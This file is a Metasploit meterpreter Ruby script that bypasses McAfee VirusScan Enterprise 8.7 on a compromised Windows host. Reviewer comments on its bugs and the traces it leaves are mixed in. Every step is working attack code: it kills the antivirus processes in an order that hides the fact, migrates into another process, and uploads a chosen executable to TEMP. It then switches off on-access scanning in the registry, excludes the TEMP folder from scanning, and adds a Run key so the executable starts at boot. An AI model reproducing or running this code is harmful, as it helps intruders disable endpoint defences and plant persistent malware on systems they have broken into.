
virusscan_bypass.rb 6.1KB

##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic
# order which keeps VirusScan icon visible at system tray without disabled sign on it.
# Additionally it lets you disable On Access Scanner from registry, upload your detectable
# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run
# registry key. (Requires administrator privilege. Tested on XP SP3)
#
# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes)
#
# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com

# Alias for the meterpreter client this script runs against; the body below
# uses `session` and `client` interchangeably for the same object.
session = client

# Options accepted by the script and parsed further down via
# @@exec_opts.parse(args). Each entry is [takes_value, help_text].
# NOTE(review): a class variable at script top level presumably relies on
# Metasploit evaluating the script inside a class scope; plain Ruby 3 rejects
# top-level class-variable access — confirm against the script runner.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false,"Help menu." ],
  "-k" => [ false,"Only kills VirusScan processes"],
  "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ]
)
################## function Declarations ##################
  22. def usage()
  23. print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com"
  24. print_line "----------------------------------------------------------------------------------------------"
  25. print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it"
  26. print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)"
  27. print_line "----------------------------------------------------------------------------------------------"
  28. print_line(@@exec_opts.usage)
  29. end
# Script-level state filled in by upload(): @location receives the remote
# TEMP directory and @path the full remote path of the uploaded file. Both
# are read again later when the exclusion-list and Run registry values are
# written, which is why they are instance variables rather than locals.
@path = ""
@location = ""
# Upload a local file into the remote TEMP directory under a randomised
# "MS<n>" name.
#
# session - the meterpreter client
# file    - local path of the file to upload; must exist
# trgloc  - accepted but never used; the destination is always TEMP
#
# Side effects: sets @location (remote TEMP) and @path (remote file path)
# before the transfer is attempted, so both are populated even when the
# upload itself fails.
# Returns the remote path chosen for the file.
# Raises RuntimeError when `file` does not exist locally. Errors from the
# transfer are rescued and only printed, so a returned path is no guarantee
# the file exists on the target.
def upload(session,file,trgloc)
  if not ::File.exist?(file)
    raise "File to Upload does not exists!"
  else
    # Remote TEMP directory; also becomes the excluded folder written to the registry later.
    @location = session.sys.config.getenv('TEMP')
    begin
      # String#scan with a capture group yields an Array of Arrays (e.g. [[".exe"]])
      # or [] when nothing matches, hence the join below. The comparison is
      # case-sensitive, and in the else branch the Array itself is interpolated
      # (its inspect form), not a plain extension.
      ext = file.scan(/\S*(.exe)/i)
      if ext.join == ".exe"
        fileontrgt = "#{@location}\\MS#{rand(100)}.exe"
      else
        fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"
      end
      # Recorded before the transfer so later registry writes use it regardless of outcome.
      @path = fileontrgt
      print_status("Uploading #{file}....")
      session.fs.file.upload_file("#{fileontrgt}","#{file}")
      print_status("Uploaded as #{fileontrgt}")
    rescue ::Exception => e
      # Rescuing ::Exception also catches interrupts and system exits; the
      # failure is only reported, not propagated to the caller.
      print_status("Error uploading file #{file}: #{e.class} #{e}")
    end
  end
  return fileontrgt
end
#parsing of Options
file = ""
# helpcall is set by -h below but never read anywhere in this script.
helpcall = 0
killonly = 0
# `args` is presumably the argument array handed to the script by the
# meterpreter script runner — it is not defined in this file.
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-e"
    file = val || ""
  when "-h"
    helpcall = 1
  when "-k"
    killonly = 1
  end
}
# Without -k an executable is mandatory. Because helpcall is unused, -h only
# results in the usage text when -e is also missing; with -k the script
# continues even if -h was given.
if killonly == 0
  if file == ""
    usage
    raise Rex::Script::Completed
  end
end
# Magic kill order :)
# Process names that are (a) matched against the running process list to
# decide whether VirusScan is present and (b) terminated in exactly this
# order further down. Names are compared after downcasing the live name.
avs = %W{
  shstat.exe
  engineserver.exe
  frameworkservice.exe
  naprdmgr.exe
  mctray.exe
  mfeann.exe
  vstskmgr.exe
  mcshield.exe
}
# Count running processes whose name is in the avs list. The count is per
# process entry, not per distinct name, so a second instance of one listed
# process also raises the count. More than six hits are required to go on.
av = 0
plist = client.sys.process.get_processes()
plist.each do |x|
  if (avs.index(x['name'].downcase))
    av = av + 1
  end
end
if av > 6
  print_status("VirusScan Enterprise v8.7.0i+ is running...")
else
  print_status("VirusScan Enterprise v8.7.0i+ is not running!")
  raise Rex::Script::Completed
end
# Move the session into mfevtps.exe — a process that is not in the avs kill
# list — before anything in that list is terminated. `target ||=` keeps a
# pre-existing value of `target` if the runner supplied one.
target_pid = nil
target ||= "mfevtps.exe"
print_status("Migrating to #{target}...")
# Get the target process pid
target_pid = client.sys.process[target]
if not target_pid
  print_error("Could not access the target process")
  raise Rex::Script::Completed
end
print_status("Migrating into process ID #{target_pid}")
client.core.migrate(target_pid)
target_pid = nil
if killonly == 1
  # -k: terminate the listed processes in list order and stop there.
  avs.each do |x|
    # Get the target process pid
    # NOTE(review): no nil check — when a listed process is not running,
    # kill() receives nil; what the meterpreter API does with that is not
    # visible here. Same pattern in the else branch below.
    target_pid = client.sys.process[x]
    print_status("Killing off #{x}...")
    client.sys.process.kill(target_pid)
  end
else
  # Full run. Every step in this branch leaves an attributable host artifact:
  # the process terminations, a new MS<n> file in the remote TEMP folder, the
  # value writes under the On Access Scanner key, and the Run-key value — the
  # things endpoint monitoring and registry auditing should be watching for.
  avs.each do |x|
    # Get the target process pid
    target_pid = client.sys.process[x]
    print_status("Killing off #{x}...")
    client.sys.process.kill(target_pid)
  end
  # Upload it
  # upload() fills @location and @path, which the registry writes below read;
  # its return value `exec` is never used again. Because upload() only prints
  # transfer errors, the Run value written at the end can point at a file
  # that never arrived.
  exec = upload(session,file,"")
  # Initiailze vars
  key = nil
  value = nil
  data = nil
  type = nil
  # Mcafee registry key
  # The next five values are all written beneath this single key. Each
  # open_key/set_value pair is a separate HKLM write; the key is reopened
  # with KEY_WRITE every time and never explicitly closed.
  key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'
  # Split the key into its parts
  root_key, base_key = client.sys.registry.splitkey(key)
  # Disable when writing to disk option
  value = "bScanIncoming"
  data = 0
  type = "REG_DWORD"
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  open_key.set_value(value, client.sys.registry.type2str(type), data)
  print_status("Successful set #{key} -> #{value} to #{data}.")
  # Disable when reading from disk option
  value = "bScanOutgoing"
  data = 0
  type = "REG_DWORD"
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  open_key.set_value(value, client.sys.registry.type2str(type), data)
  print_status("Successful set #{key} -> #{value} to #{data}.")
  # Disable detection of unwanted programs
  value = "ApplyNVP"
  data = 0
  type = "REG_DWORD"
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  open_key.set_value(value, client.sys.registry.type2str(type), data)
  print_status("Successful set #{key} -> #{value} to #{data}.")
  # Increase the number of excluded items
  # NOTE(review): the count is overwritten with 1, not incremented, so any
  # exclusions an administrator already configured stop being counted.
  value = "NumExcludeItems"
  data = 1
  type = "REG_DWORD"
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  open_key.set_value(value, client.sys.registry.type2str(type), data)
  print_status("Successful set #{key} -> #{value} to #{data}.")
  # Add executable to excluded item folder
  # The excluded entry is the whole remote TEMP directory (@location), not the
  # single uploaded file. The "3|3|" prefix is presumably VirusScan's
  # exclusion-entry encoding — its meaning is not documented here.
  value = "ExcludedItem_0"
  data = "3|3|" + @location
  type = "REG_SZ"
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  open_key.set_value(value, client.sys.registry.type2str(type), data)
  print_status("Successful set #{key} -> #{value} to #{data}.")
  # Set registry to run executable at startup
  # Persistence: value "MS" under the Run key, pointing at @path (the file in
  # TEMP). `type` is not reassigned here, so this value is written with the
  # "REG_SZ" type left over from the ExcludedItem_0 write above.
  key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
  # Split the key into its parts
  root_key, base_key = client.sys.registry.splitkey(key)
  value = "MS"
  data = @path
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  open_key.set_value(value, client.sys.registry.type2str(type), data)
  print_status("Successful set #{key} -> #{value} to #{data}.")
end
print_status("Finished!")